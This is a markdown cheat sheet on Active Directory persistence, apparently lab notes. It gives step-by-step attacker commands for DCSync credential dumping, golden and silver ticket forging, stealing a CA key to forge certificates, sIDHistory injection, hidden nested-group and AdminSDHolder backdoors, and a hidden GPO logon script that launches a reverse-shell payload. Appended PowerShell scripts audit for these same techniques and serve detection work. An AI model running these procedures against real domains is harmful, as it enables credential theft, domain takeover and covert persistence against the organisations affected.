# Active Directory Persistence

## Using Credentials

* The __Knowledge Consistency Checker (KCC)__ builds the replication topology between the domain controllers of a forest; the directory, credential material included, is replicated over that topology with the Directory Replication Service (DRS) protocol
* __DCSync__ abuses that replication: a principal holding the `Replicating Directory Changes` and `Replicating Directory Changes All` rights on the domain naming context (by default Domain Admins, Enterprise Admins, Administrators and the DCs themselves) can ask a DC for the password hashes of any account, exactly as another DC would
* Credentials worth collecting for persistence
  * Local administrator passwords, above all a password reused across many hosts
  * Service accounts with delegation rights
  * __Service accounts with high AD permissions__, for example those of Windows Server Update Services (WSUS) and System Center Configuration Manager (SCCM), which also bring code execution on every host they manage

### Usage

* Use mimikatz from a context that has replication rights

```sh
lsadump::dcsync /domain:<domain> /user:<username>
```

* Dump the krbtgt account (its key is what a golden ticket needs)

```sh
lsadump::dcsync /domain:<domain> /user:krbtgt
```

* Dump everything (adding `/csv` gives one line per account)

```sh
lsadump::dcsync /domain:<domain> /all
```

## Using Tickets

* __Golden Ticket__: a forged TGT
  * Needs the domain name, the domain SID and the user name/RID to impersonate
  * Needs the krbtgt key to encrypt and sign the ticket; the NTLM hash works, the AES256 key makes the forged ticket look like the ones the KDC actually issues
  * The krbtgt password is never rotated automatically; it only changes when an administrator resets it, and it has to be reset twice (with replication in between) before tickets signed with the old key stop working
  * A forged TGT sidesteps the smart-card requirement of an account, because that requirement is only enforced during the initial authentication the forged ticket skips
  * For the first 20 minutes after a TGT is issued the KDC does not check the account in it against the directory when it is presented in a TGS request, so even a non-existent or disabled user works during that window; after that the impersonated account must exist and be enabled
  * The lifetime is chosen by whoever forges the ticket; mimikatz defaults to 10 years
  * The ticket can be forged on any machine, without contacting a DC, as long as the krbtgt key is known
* __Silver Ticket__: a forged service ticket (TGS)
  * Encrypted and signed with the key of the targeted service account, usually the NTLM hash of the host's machine account
  * The DC is never contacted: there is no AS or TGS exchange with the KDC, so nothing is logged there; only the target host ever sees the ticket
  * The host trusts the PAC inside the ticket (PAC validation is off by default), so a user name that does not exist, combined with the SID of a privileged group (e.g. Domain Admins) in the PAC's group list, gets administrative access to that service

### Usage

* Collect the domain SID

```powershell
Get-ADDomain
```

* Forge a silver ticket for the CIFS service of one host (`/target`, `/rc4` of the machine account, `/service:cifs`); a golden ticket instead takes `/krbtgt:<NTLM hash of krbtgt>` in place of those three options

```sh
kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
```

## Using Certificates

* With the certificate and private key of an Enterprise CA, certificates can be signed for any user, and that persistence survives password changes and krbtgt resets for the lifetime of the CA certificate
* Extract the CA certificate and key with mimikatz on the CA host; `crypto::capi` and `crypto::cng` patch the crypto providers so that keys marked non-exportable can be exported anyway

```sh
crypto::certificates /systemstore:local_machine
privilege::debug
crypto::capi
crypto::cng
crypto::certificates /systemstore:local_machine /export
```

* The exported `.pfx` files are protected with the password `mimikatz`
* Use [ForgeCert](https://github.com/GhostPack/ForgeCert) to forge a client-authentication certificate for the user to impersonate (the UPN goes into the SAN); the forged certificate never passes through the CA database, so it cannot be revoked

```sh
ForgeCert.exe --CaCertPath <domain>.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@<domain> --NewCertPath Administrator.pfx --NewCertPassword SecretPassword
```

* Use Rubeus to request a TGT with the certificate (PKINIT)

```sh
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain> /dc:<IP of domain controller>
```

* Load the TGT with mimikatz, then test it

```sh
privilege::debug
kerberos::ptt administrator.kirbi
```

```powershell
dir \\<dc.example.com>\C$\
```

## Using SID History

* At logon, the user's own SID, the SIDs of its groups and every SID stored in the account's `sIDHistory` attribute are put into the access token; authorisation decisions are then made against that token
* The attribute exists for domain migrations, but any SID can be injected into the history of an account the attacker controls
* Inject the SID of a privileged group (e.g. Domain Admins or Administrators) and the token carries it from the next logon on
* `sIDHistory` cannot be written over LDAP, so it is patched directly in `ntds.dit`, the database on a DC that holds the whole directory; this needs local admin on a DC and the NTDS service stopped while the file is edited
* The account is never a member of the group, so it is absent from the group's member list and its own `memberOf`; it is only found by querying `sIDHistory` explicitly

### Usage

* Check the current SID history and group memberships of the account

```powershell
Get-ADUser <your ad username> -Properties sidhistory,memberof
```

* Get the SID of Domain Admins

```powershell
Get-ADGroup "Domain Admins"
```

* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) on the DC to patch `ntds.dit`

```powershell
Stop-Service -Name ntds -Force
Add-ADDBSidHistory -SamAccountName '<username of the low-privileged AD account>' -SidHistory '<SID to add to SID History>' -DatabasePath C:\Windows\NTDS\ntds.dit
Start-Service -Name ntds
```

* Verify the account's SIDs, log on again (the token is built at logon) and test access to the DC

```powershell
Get-ADUser <username> -Properties sidhistory
dir \\<dc.example.com>\C$\
```

## Using Group Memberships

* Direct membership of the well-known privileged groups is usually monitored
* Groups worth targeting for persistence are the less conspicuous ones that still carry privilege
  * `IT Support`
  * Groups that are local administrators on hosts
  * Groups that own GPOs
* Nested groups are how an AD is organised
  * `Helpdesk` and `Network Manager` are nested in `IT Support`
* Adding an account to a nested group is far less alarming than adding it to a privileged group directly, and the privilege still arrives through the chain

### Usage

* Create a new group

```powershell
New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<username> Steam Network 1" -SamAccountName "<username>_steam_network1" -DisplayName "<username> Steam Network 1" -GroupScope Global -GroupCategory Security
```

* Create a second one in another OU and nest the first one in it

```powershell
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
```

* Repeat a few times, then add the last group of the chain to Domain Admins

```powershell
Add-ADGroupMember -Identity "Domain Admins" -Members "<last group of the chain>"
```

* Add the low-privileged user to the first group

```powershell
Add-ADGroupMember -Identity "<username>_steam_network1" -Members "<low privileged username>"
```

* Log on again as that user (group SIDs enter the token at logon) and check

```powershell
dir \\<domain>\c$\
```

* Verify the nesting: the direct member list shows only the last group of the chain, the user only turns up with `-Recursive`

```powershell
Get-ADGroupMember -Identity "Domain Admins"
```

## Using ACLs

* `AdminSDHolder` (`CN=AdminSDHolder,CN=System,<domain DN>`) is not a group but an object whose ACL is the template for AD's protected groups and their members
  * Domain Admins
  * Administrators
  * Enterprise Admins / Schema Admins
  * plus Account, Backup, Print and Server Operators, and every account in any of these
* SDProp, running on the PDC emulator, stamps that ACL onto every protected object (those with `adminCount=1`) every 60 minutes; an ACE added to AdminSDHolder therefore reappears on every protected group and account within the hour, even after a defender removes it from an individual object

### Usage

* `runas /netonly /user:Administrator cmd.exe` and from there open `mmc`
* File -> Add/Remove Snap-in -> Active Directory Users and Computers
* View -> Advanced Features
* The AdminSDHolder object is under Domain -> System
* Right click it -> Properties -> Security -> Add -> enter the user -> Check Names -> OK -> tick Allow on Full Control -> Apply -> OK
* Once SDProp has run, the user has full control over every protected group and account and can add itself to any of them with the propagated permissions

## Using GPOs

* Restricted Groups: a policy that puts a chosen group into the local Administrators group of every host the GPO applies to
* Logon script deployment: a script that runs in the context of every user the GPO applies to, which gives a shell whenever one of them logs on

### Usage

* Build a portable executable payload (e.g. a meterpreter reverse shell)
* Write a batch script that copies the payload from SYSVOL to the host and runs it

```bat
copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\Windows\Temp\shell.exe && timeout /t 20 && C:\Windows\Temp\shell.exe
```

* Put both the script and the payload into the SYSVOL scripts folder
* `runas /netonly /user:Administrator cmd.exe` and from there open `mmc`
* File -> Add/Remove Snap-in -> Group Policy Management -> Add -> OK
* Right click the Admins OU -> Create a GPO in this domain, and Link it here -> name it
* Right click the new policy -> Enforced
* Right click the new policy -> Edit -> User Configuration -> Policies -> Windows Settings -> Scripts (Logon/Logoff)
* Right click Logon -> Properties -> Scripts tab -> Add -> Browse
* Select the batch script (it fetches the PE from SYSVOL itself)
* Catch the shell the next time an admin logs on
* To hide the policy from the users it targets, open `mmc` again and go to the policy's Delegation tab -> Advanced
* Select every trustee except Authenticated Users, including Enterprise Domain Controllers and the groups holding Edit settings, delete, modify security, and remove them
* Add -> `Domain Computers` -> Check Names -> OK -> grant Read -> OK, then select Authenticated Users and remove its Read permission
* Leave Apply Group Policy in place for Authenticated Users, otherwise the policy stops applying; since MS16-072 the computer account reads user-scope policy, which is why Domain Computers need Read, and a normal user's `gpresult` no longer lists the policy
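The three domain-level hooks described under Using Credentials, Using Tickets and Using ACLs can all be checked from one script: who holds the replication rights that make DCSync possible, who can write to the AdminSDHolder template, and how old the krbtgt key that signs golden tickets is. The following PowerShell is an added example written for this page, not code from the original notes or from any of the tools mentioned; it assumes the RSAT `ActiveDirectory` module is installed and that it runs as a domain user with ordinary read access to the domain object. The `Expected` column is an assumption of what a default domain looks like and only helps spot deviations.

```powershell
# Added example (not from the original notes): audit DCSync rights, AdminSDHolder writers
# and krbtgt key age. Requires the RSAT ActiveDirectory module; read access is enough.
Import-Module ActiveDirectory

# Extended-right GUIDs for replication (fixed values from the AD schema).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
# Assumed default holders of replication rights; anything else deserves a look.
$ExpectedReplTrustee = '\\(Domain Controllers|Enterprise Domain Controllers|Enterprise Read-only Domain Controllers|Administrators|Domain Admins|Enterprise Admins|SYSTEM)$'
$ExpectedSdHolderWriter = '\\(SYSTEM|Administrators|Domain Admins|Enterprise Admins)$'
$Rights = [System.DirectoryServices.ActiveDirectoryRights]

# Allow ACEs of an AD object, read through the AD: drive the module provides.
function Get-AdAllowAces([string]$DistinguishedName) {
    (Get-Acl -Path ("AD:\" + $DistinguishedName)).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' }
}

# Who can DCSync: a replication extended right, "all extended rights", or GenericAll on the domain root.
function Get-DcSyncPrincipals {
    $domainDn = (Get-ADDomain).DistinguishedName
    Get-AdAllowAces $domainDn | ForEach-Object {
        $guid  = $_.ObjectType.ToString()
        $right = $null
        if ($_.ActiveDirectoryRights.HasFlag($Rights::GenericAll)) { $right = 'GenericAll' }
        elseif ($_.ActiveDirectoryRights.HasFlag($Rights::ExtendedRight)) {
            if ($ReplicationRights.ContainsKey($guid))  { $right = $ReplicationRights[$guid] }
            elseif ($_.ObjectType -eq [guid]::Empty)    { $right = 'All extended rights' }
        }
        if ($right) {
            [pscustomobject]@{
                Principal = $_.IdentityReference.Value
                Right     = $right
                Expected  = $_.IdentityReference.Value -match $ExpectedReplTrustee
            }
        }
    }
}

# Write rights on the AdminSDHolder template: SDProp copies these to every protected object within the hour.
function Get-AdminSdHolderWriters {
    $dn = 'CN=AdminSDHolder,CN=System,' + (Get-ADDomain).DistinguishedName
    Get-AdAllowAces $dn |
        Where-Object {
            $r = $_.ActiveDirectoryRights
            $r.HasFlag($Rights::GenericAll) -or $r.HasFlag($Rights::WriteDacl) -or $r.HasFlag($Rights::WriteOwner) -or
            ($r.HasFlag($Rights::WriteProperty) -and $_.ObjectType -eq [guid]::Empty)   # write to all attributes
        } |
        ForEach-Object {
            [pscustomobject]@{
                Principal = $_.IdentityReference.Value
                Rights    = $_.ActiveDirectoryRights.ToString()
                Expected  = $_.IdentityReference.Value -match $ExpectedSdHolderWriter
            }
        }
}

# Age of the key every golden ticket is signed with; it changes only when an admin resets it (twice).
function Get-KrbtgtKeyAge {
    $k = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
    [pscustomobject]@{
        PasswordLastSet = $k.PasswordLastSet
        AgeDays         = [int]((Get-Date) - $k.PasswordLastSet).TotalDays
    }
}

Get-DcSyncPrincipals     | Format-Table -AutoSize
Get-AdminSdHolderWriters | Format-Table -AutoSize
Get-KrbtgtKeyAge
```

Run it before forging tickets to know whether the krbtgt key in hand is still current, and run it after the AdminSDHolder step above to confirm the ACE is in place; on the defensive side, a principal with `Expected` false in either table is exactly the persistence these sections describe.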
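The SID History section notes that an account carrying an injected SID never shows up in group listings. The script below, an added example for this page rather than code from the notes or from DSInternals, finds such accounts by querying `sIDHistory` directly and applying the two tells of the technique: an entry that belongs to the account's own domain (genuine migration history always comes from another domain) or one that resolves to a privileged group. It assumes the `ActiveDirectory` module and read access; the set of RIDs treated as privileged is an assumption of this example.

```powershell
# Added example (not from the original notes): audit sIDHistory for injected entries.
Import-Module ActiveDirectory

# Assumed privileged targets: Domain Admins 512, Schema Admins 518, Enterprise Admins 519,
# and the BUILTIN\Administrators alias S-1-5-32-544.
$PrivilegedSidPattern = '^S-1-5-(32-544|21-\d+-\d+-\d+-(512|518|519))$'

function Resolve-SidName([System.Security.Principal.SecurityIdentifier]$Sid) {
    try   { $Sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { '<unresolved>' }
}

function Get-SidHistoryFindings {
    $ownDomainSid = (Get-ADDomain).DomainSID.Value
    Get-ADObject -LDAPFilter '(sIDHistory=*)' -Properties sIDHistory, sAMAccountName |
        ForEach-Object {
            $account = $_.sAMAccountName
            foreach ($entry in $_.sIDHistory) {
                $sid = [System.Security.Principal.SecurityIdentifier]$entry
                [pscustomobject]@{
                    Account    = $account
                    HistorySid = $sid.Value
                    ResolvesTo = Resolve-SidName $sid
                    # Add-ADDBSidHistory injects SIDs from the very domain the account lives in;
                    # real migration history never does. BUILTIN SIDs have no domain part.
                    SameDomain = ($null -ne $sid.AccountDomainSid) -and ($sid.AccountDomainSid.Value -eq $ownDomainSid)
                    Privileged = $sid.Value -match $PrivilegedSidPattern
                }
            }
        }
}

Get-SidHistoryFindings | Where-Object { $_.SameDomain -or $_.Privileged } | Format-Table -AutoSize
```

Drop the final `Where-Object` to see every account with a history at all; in a domain that never went through a migration, that list should be empty.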
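The Group Memberships section relies on the fact that a chain of nested groups hides the final member from anyone who only looks at the privileged group's direct members. `Get-ADGroupMember -Recursive` flattens the chain but does not show how membership was inherited; the added example below (written for this page, not part of the original notes) walks the nesting and prints the path for each account, so a group such as `<username>_steam_network1` three levels below Domain Admins becomes visible as such. It assumes the `ActiveDirectory` module and read access to the groups.

```powershell
# Added example (not from the original notes): expand a group through all nesting levels
# and report the path by which each non-group member inherits membership.
Import-Module ActiveDirectory

function Get-NestedMemberPaths {
    param(
        [string]$Group = 'Domain Admins',
        [string[]]$Path = @(),       # group names walked so far, for display
        [string[]]$Visited = @()     # group DNs walked so far, to break membership cycles
    )
    $g    = Get-ADGroup -Identity $Group -Properties member
    $here = $Path + $g.Name
    $seen = $Visited + $g.DistinguishedName
    foreach ($memberDn in $g.member) {
        $m = Get-ADObject -Identity $memberDn -Properties sAMAccountName
        if ($m.ObjectClass -eq 'group') {
            if ($seen -contains $m.DistinguishedName) { continue }   # group nested in itself
            Get-NestedMemberPaths -Group $m.DistinguishedName -Path $here -Visited $seen
        } else {
            # Foreign security principals from other domains carry no sAMAccountName.
            $name = if ($m.sAMAccountName) { $m.sAMAccountName } else { $m.Name }
            [pscustomobject]@{
                Member = $name
                Class  = $m.ObjectClass
                Depth  = $here.Count                      # 1 = direct member
                Path   = ($here + $name) -join ' <- '
            }
        }
    }
}

# Deepest chains first: those are the memberships a glance at the group never shows.
Get-NestedMemberPaths | Sort-Object Depth -Descending | Format-Table -AutoSize
```

Keep in mind that the walk shows what the directory says, not what a given user's token currently holds: the token is rebuilt at logon, so an account added to the bottom of the chain only gains the access after it logs on again.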
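The hiding steps at the end of the GPO section leave a distinctive delegation: Authenticated Users without a standard Read level, Domain Computers with an explicit Read, and an enforced link. The added example below (written for this page; it is not code from the notes) lists every GPO with those three properties so that a hidden logon-script policy stands out. It assumes the RSAT `GroupPolicy` module and that the caller can read GPO permissions and reports, which any authenticated user can in a default domain.

```powershell
# Added example (not from the original notes): find GPOs whose delegation matches the hiding
# steps above, plus their enforced links.
Import-Module GroupPolicy

function Get-GpoDelegationFindings {
    foreach ($gpo in Get-GPO -All) {
        $perms     = Get-GPPermission -Guid $gpo.Id -All
        $authUsers = $perms | Where-Object { $_.Trustee.Name -eq 'Authenticated Users' }
        $domComps  = $perms | Where-Object { $_.Trustee.Name -eq 'Domain Computers' }

        # The GPO object carries no link information; the XML report does.
        $xml      = [xml](Get-GPOReport -Guid $gpo.Id -ReportType Xml)
        $enforced = @($xml.GPO.LinksTo | Where-Object { $_.NoOverride -eq 'true' } | ForEach-Object { $_.SOMPath })

        # Removing Read but keeping Apply Group Policy is reported as GpoCustom, an absent entry as none;
        # both mean normal users can no longer read (and therefore no longer see) the policy.
        $standardRead = $authUsers | Where-Object { $_.Permission -in 'GpoRead','GpoApply','GpoEdit','GpoEditDeleteModifySecurity' }

        [pscustomobject]@{
            Name                = $gpo.DisplayName
            Modified            = $gpo.ModificationTime
            AuthenticatedUsers  = if ($authUsers) { ($authUsers.Permission -join ',') } else { 'none' }
            DomainComputersRead = [bool]($domComps | Where-Object { $_.Permission -in 'GpoRead','GpoApply' })
            EnforcedLinks       = $enforced -join '; '
            HiddenFromUsers     = -not $standardRead
        }
    }
}

Get-GpoDelegationFindings | Where-Object { $_.HiddenFromUsers -or $_.EnforcedLinks } | Format-Table -AutoSize
```

A policy that is both `HiddenFromUsers` and enforced, with an explicit Domain Computers Read and a recent `Modified` timestamp, is the footprint of the procedure above; the logon script itself is then found under the GPO's `User\Scripts\Logon` folder in SYSVOL.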